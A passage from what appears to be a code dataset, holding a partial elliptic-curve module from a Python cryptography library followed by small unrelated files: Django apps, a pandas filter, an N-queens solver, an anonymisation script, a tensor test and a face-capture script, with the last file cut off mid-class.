@staticmethod\n def generate_curve_with_prime_order(size: int, return_both: bool=False) -> 'WeierstrassCurve':\n \"\"\"\n Generates a curve with a prime order. This method actually finds two prime curves,\n so the `return_both` determines whether to include the second.\n\n Parameters:\n size (int): Size in bits of the curve to generate.\n return_both (bool): Whether or not to return both prime curves.\n\n Returns:\n WeierstrassCurve: Generated curve.\n \"\"\"\n from samson.math.algebra.rings.integer_ring import ZZ\n\n d_fields = [ZZ/ZZ(d) for d in _D_MAP]\n\n while True:\n p = find_prime(size)\n R = ZZ/ZZ(p)\n\n for DR in d_fields:\n d = DR.characteristic()\n\n if DR(p).is_square() and R(d).is_square():\n try:\n for t,_ in cornacchias_algorithm(d, 4*p, all_sols=True):\n for trace in [t, -t]:\n n = p+1-trace\n\n if is_prime(n):\n E1 = EllipticCurve.generate_curve_with_D(d, R)\n\n if E1.random()*n:\n E1 = E1.quadratic_twist()\n\n\n result = E1\n\n if return_both:\n E2 = EllipticCurve.generate_curve_with_D(d, ZZ/ZZ(n))\n\n if E2.random()*p:\n E2 = E2.quadratic_twist()\n \n result = (E1, E2)\n\n return result\n\n except NoSolutionException:\n pass\n\n\n @staticmethod\n def generate_curve_with_k_embedding_subgroup(bits: int, k: int) -> Tuple['WeierstrassCurve', WeierstrassPoint]:\n \"\"\"\n Generates a curve with a *subgroup* whose embedding degree is `k`.\n\n Parameters:\n bits (int): Size of the underlying finite field.\n k (int): Desired embedding degree.\n\n Returns:\n Tuple[WeierstrassCurve, WeierstrassPoint]: The constructed curve and a generator of the subgroup.\n \n Examples:\n >>> from samson.math.algebra.curves.weierstrass_curve import EllipticCurve\n >>> E, g = EllipticCurve.generate_curve_with_k_embedding_subgroup(80, 12)\n >>> (E.ring.characteristic().bit_length(), g.embedding_degree())\n (80, 12)\n\n References:\n \"Constructing Elliptic Curves with Prescribed Embedding Degrees\" (https://eprint.iacr.org/2002/088.pdf)\n \"\"\"\n from samson.math.algebra.rings.integer_ring import ZZ\n from samson.math.symbols import oo\n \n # First we need to estimate the starting point\n # Since `r` will be ~l^(c.degree()), m~r, and q = m*r\n # we get the following `start`\n c = cyclomotic_polynomial(k)\n start = 2**((bits // c.degree() // 2)-3)\n\n # This is just to add some randomness\n l = start - random_int(bits*2)\n\n # There's not a super good way to estimate when increasing evaluations of the poly\n # will no longer be within our range.\n last_attempts = []\n attempt_memory = 20\n\n while True:\n l += 1\n r = c(l)\n if not r.is_prime():\n continue\n\n t = l+1\n A = 4*r\n B = (l-1)**2\n attempt_min = oo\n\n for D in [3, 7, 11, 19, 43, 67, 163, 27, 35, 51, 91, 115, 123, 187, 235, 267, 403, 427]:\n MD = ZZ/ZZ(D)\n mdA = MD(A)\n\n if not mdA.is_invertible():\n continue\n\n m0 = ZZ(MD(B)/mdA)\n z0 = (A*m0-B) // D\n MR = ZZ/r\n mrZ = MR(z0)\n\n if not mrZ.is_square():\n continue\n\n V = ZZ(mrZ.sqrt())\n if (V**2 - z0) % 4:\n continue\n\n i0 = (V**2 - z0) // A\n mi = m0 + i0.val*D\n\n n = mi*r\n q = n+t-1\n\n attempt_min = min(q.val.bit_length(), attempt_min)\n\n if q.val.bit_length() == bits and q.is_prime():\n if all(pow(int(q), i, int(r)) != 1 for i in range(1,k)) and pow(int(q), k, int(r)) == 1:\n E = EllipticCurve.generate_curve_with_D(D, ZZ/q)\n\n # Did we get a good curve?\n if E.trace() in [t, -t]:\n if E.trace() != t:\n E = E.quadratic_twist()\n \n g = E.find_gen()\n return E, g*int((g.order() // r))\n\n\n last_attempts.append(attempt_min)\n last_attempts = last_attempts[-attempt_memory:]\n\n if len(last_attempts) == attempt_memory:\n # Here we predict whether it's feasible `r` will ever be the right size\n # based on past attempts\n if all([attempt_bits > bits for attempt_bits in last_attempts]):\n raise SearchspaceExhaustedException\n\n # If we're always too low, let's use the past attempts to predict\n # how big of jump we can make. Note, we clear `last_attempts` to prevent\n # making multiple jumps without sampling a new `error_ratio`.\n elif all([attempt_bits < bits for attempt_bits in last_attempts]):\n avg = sum(last_attempts) / attempt_memory\n error_ratio = bits / avg\n l += int(l * error_ratio * 0.1)\n last_attempts = []\n\n\n @staticmethod\n def generate_curve_with_k12_prime_order(bits: int) -> 'WeierstrassCurve':\n \"\"\"\n Generates a curve with prime order and embedding degree 12.\n\n Parameters:\n bits (int): Desired size of underlying field.\n\n Returns:\n WeierstrassCurve: Prime-order curve with an embedding degree of 12.\n\n References:\n \"Pairing-Friendly Elliptic Curves of Prime Order\" (https://eprint.iacr.org/2005/133.pdf)\n \"\"\"\n from samson.utilities.general import binary_search_unbounded, lazy_shuffle\n from samson.math.symbols import Symbol\n from samson.math.algebra.rings.integer_ring import ZZ\n\n def gen_curve_params():\n x = Symbol('x')\n _ = ZZ[x]\n P = 36*x**4 + 36*x**3 + 24*x**2 + 6*x + 1\n T = 6*x**2 + 1\n\n start = binary_search_unbounded(lambda n: P(-n).val.bit_length() < bits)\n end = binary_search_unbounded(lambda n: P(-n).val.bit_length() < (bits+1))\n\n for l in lazy_shuffle(range(start, end)):\n t = int(T(l))\n for val in (-l, l):\n p = int(P(val))\n n = p + 1 - t\n if is_prime(p) and is_prime(n):\n return p, n\n\n\n p, n = gen_curve_params()\n R = ZZ/ZZ(p)\n b = R(0)\n\n while True:\n b += 1\n while not (b+1).is_square():\n b += 1\n\n y = (b+1).sqrt()\n E = EllipticCurve(R(0), b)\n G = E(1, y)\n\n if not G*n:\n E.cardinality_cache = n\n return E\n\n\n\n @RUNTIME.global_cache()\n def to_montgomery_form(self) -> ('MontgomeryCurve', Map):\n \"\"\"\n Finds an equivalent Montgomery curve if it exists.\n\n Returns:\n (MontgomeryCurve, Map): Formatted as (equivalent MontgomeryCurve, map to convert points).\n\n Examples:\n >>> from samson.math.algebra.curves.weierstrass_curve import EllipticCurve\n >>> # Generate a curve with order divisble by 4\n >>> E = EllipticCurve.generate_curve_with_trace(80, 6)\n >>> M, phi = E.to_montgomery_form()\n >>> P = E.random()\n >>> d = random_int(P.order())\n >>> Q = P*d\n >>> phi(P)*d == phi(Q)\n True\n\n References:\n https://en.wikipedia.org/wiki/Montgomery_curve#Equivalence_with_Weierstrass_curves\n \"\"\"\n from samson.math.symbols import Symbol\n from samson.math.algebra.curves.montgomery_curve import MontgomeryCurve\n\n # Order must be divisible by 4\n if self.order() % 4:\n raise NoSolutionException(\"Order must be divisible by 4\")\n\n\n z = Symbol('z')\n _ = self.ring[z]\n\n # Curve equation must have roots\n roots = self.defining_polynomial().roots()\n\n if not roots:\n raise NoSolutionException(\"Curve equation has no roots\")\n\n\n # Derivative at root must be a square\n for alpha in roots:\n delta = 3*alpha**2 + self.a\n\n if not delta.is_square():\n continue\n\n s = ~delta.sqrt()\n\n if self.G_cache:\n x, y = s*(self.G.x-alpha), self.G.y*s\n else:\n x, y = None, None\n \n A = 3*alpha*s\n curve = MontgomeryCurve(A=A, B=s, U=x, V=y, order=self.order() // 2)\n\n inv_B = ~s\n inv_B3 = ~(s*3)\n\n def inv_map_func(point):\n return self((point.x*inv_B) + (A*inv_B3), point.y*inv_B)\n\n point_map = Map(self, curve, lambda point: curve(s*(point.x-alpha), s*point.y), inv_map=inv_map_func)\n return curve, point_map\n\n raise NoSolutionException(\"'delta' is not a quadratic residue\")\n\n\n def element_at(self, x: int) -> WeierstrassPoint:\n \"\"\"\n Returns the `x`-th element w.r.t to the generator.\n\n Parameters:\n x (int): Element ordinality.\n\n Returns:\n WeierstrassPoint: The `x`-th point.\n \"\"\"\n return self.G*x\n\n\n def recover_point_from_x(self, x: int) -> WeierstrassPoint:\n \"\"\"\n Uses the curve equation to create a point with x-coordinate `x`.\n\n Parameters:\n x (int): x-coordinate.\n \n Returns:\n WeierstrassPoint: Point at x-coordinate.\n \"\"\"\n x = self.ring(x)\n y = (x**3 + self.a*x + self.b).sqrt()\n return WeierstrassPoint(x, y, self)\n\n\n def random(self, size: 'RingElement'=None) -> WeierstrassPoint:\n \"\"\"\n Generate a random element.\n\n Parameters:\n size (RingElement): The ring-specific 'size' of the element.\n \n Returns:\n WeierstrassPoint: Random element of the algebra.\n \"\"\"\n while True:\n try:\n return self.recover_point_from_x(self.ring.random(size))\n except NoSolutionException:\n pass\n\n\n def division_poly(self, n: int) -> Polynomial:\n \"\"\"\n Finds the `n`-th division polynomial.\n\n Parameters:\n n (int): Index of division polynomial.\n\n Returns:\n Polynomial: Division polynomial of the curve.\n \"\"\"\n if n in self.dpoly_cache:\n return self.dpoly_cache[n]\n\n x = self.curve_poly_ring.poly_ring.symbol\n\n a, b = self.a, self.b\n d_poly = None\n\n if n == -1:\n d_poly = self.curve_poly_ring(4*x**3 + 4*a*x + 4*b)\n\n elif n in [0, 1]:\n d_poly = self.curve_poly_ring(n)\n\n elif n == 2:\n d_poly = self.curve_poly_ring((0, 2))\n\n elif n == 3:\n d_poly = self.curve_poly_ring(3*x**4 + 6*a*x**2 + 12*b*x - a**2)\n\n elif n == 4:\n d_poly = self.curve_poly_ring((0, 4*x**6 + 20*a*x**4 + 80*b*x**3 - 20*a**2*x**2 - 16*a*b*x - 4*a**3 - 32*b**2))\n\n else:\n y = self.curve_poly_ring((0, 1))\n two = self.curve_poly_ring.poly_ring([2])\n psi = self.division_poly\n\n for j in range(5, n+1):\n k, m = divmod(j, 2)\n\n if m:\n self.dpoly_cache[j] = psi(k+2) * psi(k)**3 - psi(k+1)**3 * psi(k-1)\n else:\n if k % 2 == 0:\n self.dpoly_cache[j] = self.curve_poly_ring((psi(k).y_poly // two)) * (psi(k+2) * psi(k-1)**2 - psi(k-2) * psi(k+1)**2)\n else:\n self.dpoly_cache[j] = y * (psi(k).x_poly // two) * (psi(k+2) * psi(k-1).y_poly**2 - psi(k-2) * psi(k+1).y_poly**2)\n\n d_poly = self.dpoly_cache[n]\n\n\n self.dpoly_cache[n] = d_poly\n\n return d_poly\n\n\n def _division_polynomials_mod(self, n: int, mod: Polynomial):\n a, b = self.a, self.b\n x = Symbol('x')\n R = self.ring\n P = R[x]\n P = P/mod\n x = P(x)\n\n div = {}\n div2 = {}\n div02 = {}\n\n div[-1] = 4*x**3 + 4*a*x + 4*b\n div[0] = R(0)\n div[1] = R(1)\n div[2] = R(1)\n div[3] = 3*x**4 + 6*a*x**2 + 12*b*x - a**2\n div[4] = 2*(x**6 + 5*a*x**4 + 20*b*x**3 - 5*a**2*x**2 - 4*a*b*x - a**3 - 8*b**2)\n\n f = P(self.defining_polynomial())\n\n # Initialize caches\n if not div2:\n for i in range(5):\n div2[i] = div[i]*div[i]\n\n for i in range(3):\n div02[i] = div[i]*div[i+2]\n\n\n ff16 = 16*f*f\n for i in range(5, n+1):\n k, m = divmod(i, 2)\n dkk = div02[k]*div2[k]\n dk1 = div02[k-1]*div2[k+1]\n\n if m:\n if k % 2 == 0:\n pol = ff16*dkk-dk1\n else:\n pol = dkk-ff16*dk1\n else:\n pol = (div02[k]*div2[k-1]-div02[k-2]*div2[k+1])\n \n div[i] = pol\n div2[i] = pol*pol\n div02[i-2] = div[i-2]*div[i]\n\n return div, div2, div02\n\n\n\n def abelian_group_generators(self) -> (WeierstrassPoint, WeierstrassPoint):\n \"\"\"\n Finds two generators that together fully generate the curve. This is useful when\n the curve is isomorphic to a direct product of two abelian additive groups and not\n just one.\n\n Returns:\n (WeierstrassPoint, WeierstrassPoint): Formatted as (Generator of group one, generator of group two).\n\n Examples:\n >>> from samson.math.algebra.curves.weierstrass_curve import EllipticCurve\n >>> from samson.math.algebra.rings.integer_ring import ZZ\n >>> R = ZZ/ZZ(828109)\n >>> a = R(654207)\n >>> b = R(0)\n >>> card = 828104\n >>> E = EllipticCurve(a, b, cardinality=card)\n >>> G1, G2 = E.abelian_group_generators()\n >>> G1.order()*G2.order() == E.order()\n True\n\n >>> G1.linear_relation(G2)[0] == 0\n True\n\n References:\n https://github.com/sagemath/sage/blob/ca088c9c9326542accea1f878e791b82cb37a3e1/src/sage/schemes/elliptic_curves/ell_finite_field.py#L843\n \"\"\"\n P = self.zero\n N = self.order()\n\n while True:\n Q = 0\n while not Q:\n Q = self.random()\n\n if Q*P.order():\n P = P.merge(Q)\n else:\n n1 = P.order()\n n1a = n1 // gcd(n1, N // n1)\n n1b = n1 // n1a\n\n if n1 == N:\n return P, self.zero\n\n if self.order() // n1 == n1b:\n Z = P*n1a\n\n while True:\n Q = self.random()\n if not Q.order() % n1b:\n W = Q*(Q.order() // n1b)\n\n if W != Z:\n return P, W\n\n\n\n @RUNTIME.global_cache()\n def additive_transfer_map(self) -> 'Map':\n \"\"\"\n Generates a map to `Qp` such that if `Q` = `P`*`d`, then `phi(Q)` = `phi(P)`*`d`.\n\n Returns:\n Map: Map function.\n\n Examples:\n >>> from samson.math.algebra.curves.weierstrass_curve import EllipticCurve\n >>> E = EllipticCurve.generate_curve_with_trace(256, 1)\n >>> g = E.G\n >>> d = random_int(g.order())\n >>> q = g*d\n >>> phi = E.additive_transfer_map()\n >>> int((phi(q)/phi(g))[0]) == d\n True\n\n References:\n https://www.hpl.hp.com/techreports/97/HPL-97-128.pdf\n https://hxp.io/blog/25/SharifCTF-2016-crypto350-British-Elevator-writeup/\n \"\"\"\n from samson.math.algebra.rings.padic_numbers import Qp\n E = self\n p = E.ring.characteristic()\n\n if self.random() * p:\n raise ValueError(f\"{E} is not trace one\")\n\n\n # Move everything into p-adic numbers\n Qp2 = Qp(p, 8)\n QpA = Qp2(E.a)\n QpB = Qp2(E.b)\n Ep = EllipticCurve(QpA, QpB)\n formal_log = Ep.formal_group().log()\n\n # Lift points to the new curve\n def lift_point(x, y):\n Qpy = (x ** 3 + QpA * x + QpB).sqrt()\n QpP = Ep(x, (-Qpy, Qpy)[Qpy.val[0] == y])\n return QpP\n \n\n def add_trans(P):\n QpxP = Qp2(P.x)\n PQp = lift_point(QpxP, P.y)\n pPQp = p * PQp\n tP = -pPQp.x / pPQp.y\n return formal_log(tP) / p\n\n return Map(E, Qp2, add_trans)\n\n\n\nEllipticCurve = WeierstrassCurve\n","repo_name":"wildcardcorp/samson","sub_path":"samson/math/algebra/curves/weierstrass_curve.py","file_name":"weierstrass_curve.py","file_ext":"py","file_size_in_byte":67989,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"32"} +{"seq_id":"31808190912","text":"def frequency_distribution(sequence):\n frequency = {}\n\n for value in sequence:\n if value in frequency:\n frequency[value] += 1\n else:\n frequency[value] = 1\n\n return frequency\n\nlst = [2,2,9,1,2,2,1,4,2,2,3,1]\nresult = frequency_distribution(lst)\nprint(result)\n\n\n# lst = []\n# n = int(input(\"total numbers ? \"))\n# for i in range (n):\n# lst[i] = int(input(f'enter number #{i+1} '))\n\n# seq = [1,1,1,1,1,-1,0,-2,-1]\n# dict={}\n# i = 0\n# count = 0\n# while i < len(seq):\n# if(seq[i] in dict):\n# count += 1\n# dict.update({seq[i]:count})\n# else:\n# dict[seq[i]] = 1\n# count = 1\n# i+=1\n# print(dict)","repo_name":"Ritesh1312/Python_Training_Assignments","sub_path":"Assignment_2/frequency_distribution.py","file_name":"frequency_distribution.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73147030810","text":"from django.conf.urls import url\nfrom .views import Home, home_en, home_kn\n\nurlpatterns = [\n url('^en/$', home_en, name='homeen'),\n url('^kn/$', home_kn, name='homekn'),\n url('^$', Home, name='home'),\n]\n\napp_name = 'olora_frontend'\n","repo_name":"aiegoo/django-blog","sub_path":"sandbox/apps/olora_frontend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16709355413","text":"import pandas as pd\n\n# Charger le fichier CSV\ndf = pd.read_csv('rugby_dataset.csv')\n\n# Convertir la colonne 'date' en format de date\ndf['date'] = pd.to_datetime(df['date'])\n\n# Filtrer les lignes pour ne conserver que celles à partir de 2013\ndf = df[df['date'].dt.year >= 2013]\n\n# Enregistrer le nouveau DataFrame dans un nouveau fichier CSV\ndf.to_csv('rugby_filtered.csv', index=False)\n","repo_name":"estebanbaigts/world_cup_rugby_algo","sub_path":"sort_rugby.py","file_name":"sort_rugby.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27672367025","text":"from django.contrib import admin\n\nfrom .models import Incident, SocialMediaIncident, CloseEndQs, CloseEndQsChoice\n\nfrom django.contrib.auth.models import Group\n\n\n#class IncidentAdmin(admin.ModelAdmin):\n# readonly_fields = ['name', 'latitude', 'longitude', 'disaster_type',\n# 'contact_no', 'address', 'synced_date', 'reported_date',\n# 'description']\n\n #def has_add_permission(self, request):\n # return False\n\n #def has_delete_permission(self, request, obj=None):\n # return False\n\n #def has_save_permission(self, request, obj=None):\n # return False\n\nclass ChoiceInline(admin.StackedInline):\n model = CloseEndQsChoice\n #extra = 3\n\n\nclass CloseEndQsAdmin(admin.ModelAdmin):\n fieldsets = [\n (None, {'fields': ['question']}),\n ]\n inlines = [ChoiceInline]\n\n#admin.site.register(Incident, IncidentAdmin)\nadmin.site.register(Incident)\nadmin.site.register(SocialMediaIncident)\nadmin.site.unregister(Group)\nadmin.site.register(CloseEndQs, CloseEndQsAdmin)\n\n","repo_name":"GeoEDGE/cfr_web","sub_path":"incidents/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2892724382","text":"#!/usr/bin/env python\n\"\"\"N-queens problem\nDeep first search using basic list of list grid\n\"\"\"\n\n\nclass Board:\n def __init__(self, size):\n self.size = size\n self.boxes = [[0 for c in range(size)] for r in range(size)]\n\n def solve(self, col):\n if col >= self.size:\n return True\n for row in range(self.size):\n if self.allow(row, col):\n self.boxes[row][col] = 1\n if self.solve(col + 1):\n return True\n self.boxes[row][col] = 0\n return False\n\n def allow(self, row, col):\n # Check this row on left side\n for c in range(col):\n if self.boxes[row][c]:\n return False\n # Check upper diagonal on left side\n for r, c in zip(range(row, -1, -1), range(col, -1, -1)):\n if self.boxes[r][c]:\n return False\n # Check lower diagonal on left side\n for r, c in zip(range(row, self.size), range(col, -1, -1)):\n if self.boxes[r][c]:\n return False\n return True\n\n def display(self):\n for row in range(self.size):\n for col in range(self.size):\n if self.boxes[row][col]:\n print(\"* \", end=\"\")\n else:\n print(\". \", end=\"\")\n print()\n\n\ndef main(size=18):\n print(f\"solving for size {size}:\")\n board = Board(size)\n if board.solve(0):\n board.display()\n else:\n print(\"No solution.\")\n\n\nif __name__ == \"__main__\":\n import sys\n from time import perf_counter\n\n t0 = perf_counter()\n main(int(sys.argv[1]))\n print(f\"duration: {perf_counter() - t0:.3f}s\")\n","repo_name":"abilian/cythonplus-sandbox","sub_path":"exemples/n-queens/py_basic_dfs/n_queens_basic_dfs.py","file_name":"n_queens_basic_dfs.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"73047095451","text":"\"\"\"Customer Model\"\"\"\nfrom google.appengine.ext import ndb\n\nfrom server.common.util import get_ancestor_key, parse_id, populate\nfrom server.models.order_model import Order\n\n\nclass Customer(ndb.Model):\n \"\"\"The Customer Model definition.\"\"\"\n first_name = ndb.StringProperty()\n last_name = ndb.StringProperty()\n email = ndb.StringProperty()\n phone = ndb.StringProperty()\n\n def as_dict(self, orders=[]):\n \"\"\"Converts the datastore reponse into a JSON parsable dictionary.\"\"\"\n return {\n 'id': self.key.id(),\n 'first_name': self.first_name,\n 'last_name': self.last_name,\n 'email': self.email,\n 'phone': self.phone,\n 'orders': orders\n }\n\n @property\n def orders(self):\n return Order.query(ancestor=self.key)\n\n\ndef all():\n \"\"\"Gets all the items for a resource.\"\"\"\n customers = Customer.query(ancestor=get_ancestor_key())\n\n # Loop through each customer. For each customer, fetch their orders.\n results = []\n for i, customer in enumerate(customers):\n orders = list(customer.orders.fetch())\n orders_dict = [order.as_dict() for order in orders]\n results.append(customer.as_dict(orders_dict))\n\n return results\n\n\ndef create(body):\n \"\"\"Creates a new record for the resource.\"\"\"\n customer = Customer(parent=get_ancestor_key())\n customer = populate(Customer, customer, body)\n customer.put()\n return customer.as_dict()\n","repo_name":"dlochrie/ph-datastore","sub_path":"server/models/customer_model.py","file_name":"customer_model.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33792442427","text":"from django.shortcuts import render, redirect\nfrom .models import Book\nfrom .models import Author \n\ndef index(request):\n context = {\n \"all_the_books\": Book.objects.all()\n }\n return render(request, \"books_authors_app/index.html\", context)\n\ndef book(request, my_val):\n context = {\n \"Book\": Book.objects.get(id=my_val),\n \"Authors\": Book.objects.get(id=my_val).authors,\n \"allauthors\": Author.objects.all(),\n }\n return render(request, \"books_authors_app/books.html\", context)\n\ndef add_book(request):\n new_book = Book.objects.create(title=request.POST[\"new_title\"],desc=request.POST[\"desc\"])\n return redirect(\"/books/\"+str(new_book.id))\n\ndef add_author(request):\n new_author= Author.objects.create(first_name=request.POST[\"first_name\"],last_name=request.POST[\"last_name\"],notes=request.POST[\"notes\"])\n return redirect(\"/authors/\"+str(new_author.id))\n\ndef index2(request):\n context = {\n \"all_the_authors\": Author.objects.all()\n }\n return render(request, \"books_authors_app/index2.html\", context)\n\n\ndef author(request, my_val):\n context = {\n \"Author\": Author.objects.get(id=my_val),\n \"Books\": Author.objects.get(id=my_val).books,\n \"allbook\": Book.objects.all(),\n }\n return render(request, \"books_authors_app/authors.html\", context)\n\ndef addbooktoauthor(request):\n if request.method == \"POST\":\n id = request.POST[\"authors\"]\n author = Author.objects.get(id=id)\n book_id = request.POST[\"bookid\"]\n books = Book.objects.get(id=book_id)\n author.books.add(books)\n\n return redirect('/author/' + id)\n\n\ndef addnewauthor(request):\n if request.method == \"POST\":\n first_name = request.POST[\"first_name\"]\n last_name = request.POST[\"last_name\"]\n notes = request.POST[\"notes\"]\n new_author = Author.objects.create(first_name=first_name, last_name=last_name, notes=notes)\n\n return redirect('/author/' + str(new_author.id))","repo_name":"kevindavidly/Books_Authors_Django","sub_path":"apps/books_authors_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16264959166","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 15 2020\n\n@author: Florentin Bodjona\n\nSript demandé pour la question 3 du test de Braincube pour le stage de recherche\n\nOn réalise ici l'anonymisation des données nominales nom et ville en affectant à chaque valeur un entier \n\"\"\"\n\nimport pandas as pd\nimport os \n\n# Stockage des données dans la DataFrame donnees\n\ndonnees = pd.read_csv(\"depenses.csv\")\n\n# Initialisation des dictionnaires devant contenir les clés\n\nid_noms = dict()\nid_villes = dict()\n\n# Remplissage des dictionnaires avec les clés et les entiers asscociés\n# Le premier nom reçoit la valeur 1, ainsi de suite de sorte qu'il n'y ait pas de répétition\n\nid_noms = {cle : id for id,cle in enumerate(donnees['nom']) \n if cle not in id_noms.keys()}\n\n# Toutes les villes reçoivent des valeurs entieres distinctes\n# Les entiers ici ne débutent pas par 0 (??)\n\nid_villes = {cle : id for id,cle in enumerate(donnees['ville']) \n if cle not in id_villes.keys()}\n\n# On remplace dans les colonnes nom et ville chaque valeur par l'entier qui y correspond\n\ndonnees['nom'] = donnees['nom'].apply(lambda x : id_noms[x])\ndonnees['ville'] = donnees['ville'].apply(lambda x : id_villes[x])\n\n\n# Centrage et réduction des données ordinales age, salaire et dépenses\n\nfor i in range(2,5):\n # Calcul de la moyenne\n \n moyenne = donnees.iloc[:,i].mean()\n \n # Calcul de l'écart-type\n \n ecart_type = donnees.iloc[:,i].std()\n \n # Remplacement de chaque valeur par sa valeur centrée-réduite dans le tableau\n \n donnees.iloc[:,i] = donnees.iloc[:,i].apply(lambda x: (x - moyenne)/ecart_type)\n \n# Stockage du résultat dans un fichier csv\n\ndonnees.to_csv('depenses_anonymes.csv', index = False)","repo_name":"FloBodj/Braincube_test","sub_path":"anonymisation.py","file_name":"anonymisation.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35190483755","text":"import numpy as np\n\nfrom unittest import TestCase\n\nfrom tucker_riemopt import backend as back, set_backend\nfrom tucker_riemopt import Tucker\nfrom tucker_riemopt.riemopt import compute_gradient_projection\n\n\nclass RiemoptTest(TestCase):\n\n def createTestTensor(self, n=4):\n \"\"\"\n A = [G; U, V, V], V = ones(n x n)\n \"\"\"\n common_factor = np.random.randn(n, n)\n common_factor = back.tensor(common_factor)\n common_factor = back.qr(common_factor)[0]\n symmetric_factor = back.tensor(np.random.randn(n, n))\n symmetric_factor = back.qr(symmetric_factor)[0]\n symmetric_modes = [1, 2]\n core = back.tensor(np.random.randn(n, n, n))\n return Tucker(core, [common_factor, symmetric_factor, symmetric_factor])\n\n def testGradProjection(self):\n set_backend(\"pytorch\")\n np.random.seed(229)\n\n def f_full(A):\n return (A ** 2 - A).sum()\n\n def f(T: Tucker):\n A = T.full()\n return (A ** 2 - A).sum()\n\n full_grad = back.grad(f_full, argnums=0)\n\n T = self.createTestTensor(4)\n\n eucl_grad = full_grad(T.full())\n riem_grad, _ = compute_gradient_projection(f, T)\n\n assert(np.allclose(back.to_numpy(eucl_grad), back.to_numpy(riem_grad.full()), atol=1e-5))\n\n\n","repo_name":"johanDDC/tucker_riemopt","sub_path":"test/common/riemopt_test.py","file_name":"riemopt_test.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"73533645850","text":"import cv2\nimport face_recognition\nimport sys \nimport os\nfrom dotenv import load_dotenv\nimport requests\n\nload_dotenv(\"./.env\")\n\n#conn.scp_download('mirori_faces/*', \"npy_files/\")\n\nif len(sys.argv) > 1:\n email = sys.argv[1]\nelse:\n email = input(\"Email Visiteur: \")\n\nback_route = os.getenv(\"back_route\")\napi_key = os.getenv(\"api_key\")\ndata = {\"api_key\": api_key}\ncomposed_route = back_route + \"api/user/email/\" + email\nresponse = requests.post(composed_route, data=data)\nif response.status_code != 200:\n print(\"Erreur avec l'API, email inconnue ?\")\n exit()\nres = response.json()\nif not res[\"id\"]:\n print(\"API DON'T RETURN ID, response: \", res)\n exit()\nid = res[\"id\"]\n\nvideo_capture = cv2.VideoCapture(0, cv2.CAP_V4L2)\nvideo_capture.set(cv2.CAP_PROP_FRAME_WIDTH, 800)\nvideo_capture.set(cv2.CAP_PROP_FRAME_HEIGHT, 600)\n\n\nface_locations = []\n\nprint(\"****** ACQ PROGRAMM IS READY ! ******\")\nprint(\"SPACE BAR FOR TAKING A REFERENCE FACE IMAGE\")\nprint(\"ESC FOR EXIT\")\nwhile True:\n ret, frame = video_capture.read() # Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)\n #ERROR IF NO FACE DETETED\n rgb_frame = frame[:, :, ::-1] # Find all the faces in the current frame of video\n face_locations = face_recognition.face_locations(rgb_frame) # Display the results\n for top, right, bottom, left in face_locations:\n # Draw a box around the face\n cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2) # Display the resulting image\n cv2.imshow('Video', frame)\n \n key = cv2.waitKey(1)\n \n if key & key % 256 == 27:\n # ESC pressed for Quit\n video_capture.release()\n cv2.destroyAllWindows()\n break\n elif key & key % 256 == 32:\n # SPACE pressed for Screenshot\n img_name = \"identity.jpeg\"\n parent_folder = \"./identified/\"\n folder = str(id) + \"/\"\n path = os.path.join(parent_folder, folder)\n filename = path + img_name\n if not os.path.exists(filename):\n os.mkdir(path, 0o755)\n cv2.imwrite(path + img_name, frame)\n video_capture.release()\n cv2.destroyAllWindows()\n\n if os.path.exists(filename):\n import prepare_embedding as pe\n\n pe.encoding_image(parent_folder)\n print(\"REFERENCE IMAGE TAKEN FOR: \", id)\n else:\n print(\"IMAGE DOESN'T EXISTS, SOMETHING WENT WRONG\")\n break\n \n","repo_name":"gravity-zero/Mirori_ACQ","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29956661047","text":"\ndef palindrome_type(n):\n s = 0\n pal = lambda s : s == s[::-1]\n if pal(str(n)):\n s += 1\n if pal(format(n, 'b')):\n s += 2\n return ['Neither!','Decimal only.','Binary only.','Decimal and binary.'][s]\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"QuxCNBLcGJReCawjz_0.py","file_name":"QuxCNBLcGJReCawjz_0.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34794010040","text":"import torch\nimport torch.nn as nn\nimport torchvision.models as models\n\nclass ActionAssigner(nn.Module):\n def __init__(self,\n backbone_nn='resnet18',\n input_size=512,\n hidden_size=512,\n actionlen=6,\n actionclass_num=4):\n super(ActionAssigner, self).__init__()\n self.backbone_nn = backbone_nn\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.actionlen = actionlen\n self.backbone_nn_name = backbone_nn\n self.actionclass_num = actionclass_num\n\n self.construct_actionseq_predFC()\n self.construct_actionseq_predict_logits()\n self.construct_backbone_nn()\n self.construct_merge_fc_layer()\n self.construct_LSTM_layer()\n\n def construct_LSTM_layer(self):\n 